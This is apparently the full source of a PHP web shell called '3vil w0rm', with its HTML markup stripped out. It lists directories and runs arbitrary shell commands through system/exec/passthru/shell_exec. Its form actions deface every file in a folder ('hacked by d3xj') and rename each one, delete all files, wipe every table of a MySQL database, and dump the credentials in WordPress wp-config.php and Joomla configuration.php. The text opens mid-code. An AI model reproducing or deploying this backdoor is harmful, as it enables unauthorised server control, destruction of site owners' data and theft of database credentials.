3vil w0rm

".$perm.""; } else { return "".$perm.""; } } function r($dir,$perm) { if(!is_readable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); echo "You are here: "; foreach($scdir as $c_dir => $cdir) { echo "$cdir/"; } echo " [ ".w($dir, perms($dir))." ]
"; echo ' '; if (isset($_POST['go'])) { error_reporting(0); set_time_limit(0); $time_start = microtime(true); for($i=0; $i<1000; $i++){ } $time_end = microtime(true); $execution_time = ($time_end - $time_start)/60; echo '
total time execute in '.$execution_time.' secons'; $files = glob('*.{*}', GLOB_BRACE); foreach ($files as $filename) { $a_str = array("hacked by d3xj zuahahahaha"); $contents = implode(PHP_EOL, $a_str); $contents .= PHP_EOL . PHP_EOL; file_put_contents($filename, $contents); $newname = str_replace(array(".bmp", ".gif", ".jpg", ".png", ".php", ".html", ".txt", ".ico", ".sql", ".ini",".log",".css", ".rar", ".zip", ".xml", ".js", ".dist", ".json", ".scss", ".jpeg", ".crt", ".eot", ".svg", ".ttf", ".woff", ".swf", ".js.gz", ".gz", ".pot", ".htm", ".po", ".mo", ".otf"), ".d3xj", $filename); if(rename($filename, $newname)===true){ print '
⇢ '.$filename.' infected 👍'.$time.''; } else{ print '
⇢ '.$filename.' failed 👎'.$time.''; } } } if (isset($_POST['sad'])) { $files = glob('*.{*}', GLOB_BRACE); foreach ($files as $filename) { error_reporting(0); set_time_limit(0); if (unlink($filename)) { print '
⇢ '.$filename.' deleted 👍'; } else { print '
⇢ '.$filename.' failed 👎'; } } } if (isset($_POST['drop'])) { error_reporting(0); set_time_limit(0); $time_start = microtime(true); for($i=0; $i<1000; $i++){ } $time_end = microtime(true); $execution_time = ($time_end - $time_start)/60; echo '
total time execute in '.$execution_time.' minute'; $host = $_POST['host']; $username = $_POST['username']; $password = $_POST['password']; $db = $_POST['db']; mysql_connect($host,$username,$password) or die("Failed login tolol"); mysql_select_db($db) or die("Database ga bisa dibuka tolol"); $res = mysql_query("SHOW TABLES"); $tables = array(); while($row = mysql_fetch_array($res, MYSQL_NUM)) { $tables[] = "$row[0]"; } $length = count($tables); for ($i = 0; $i < $length; $i++) { $res = "DELETE FROM $tables[$i]"; mysql_query($res); print '
⇢ '.$res.' success 👍'; } } if (isset($_POST['wp'])) { error_reporting(0); set_time_limit(0); $file = fopen("wp-config.php", "r") or die("Can't open wp-config.php"); while(! feof($file)) { echo fgets($file). "
"; } fclose($file); } if (isset($_POST['jomla'])) { error_reporting(0); set_time_limit(0); $file = fopen("configuration.php", "r") or die("Can't open configuration.php"); while(! feof($file)) { echo fgets($file). "
"; } fclose($file); } echo '

'; if(is_dir($dir) === true) { if(!is_readable($dir)) { echo "can't open directory. ( not readable )"; } else { echo '

'; $scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } } } else { echo "can't open directory."; } foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$dir/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$dir/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$dir/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$dir/$file"); } if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "

Name	Type	Size	Last Modified	Owner/Group	Permission
$href	$dtype	-	$dtime	$downer/$dgrp	".w("$dir/$dirx",perms("$dir/$dirx"))."
$file	$ftype	$size	$ftime	$fowner/$fgrp	".w("$dir/$file",perms("$dir/$file"))."

"; if(!is_readable($dir)) { // } ?>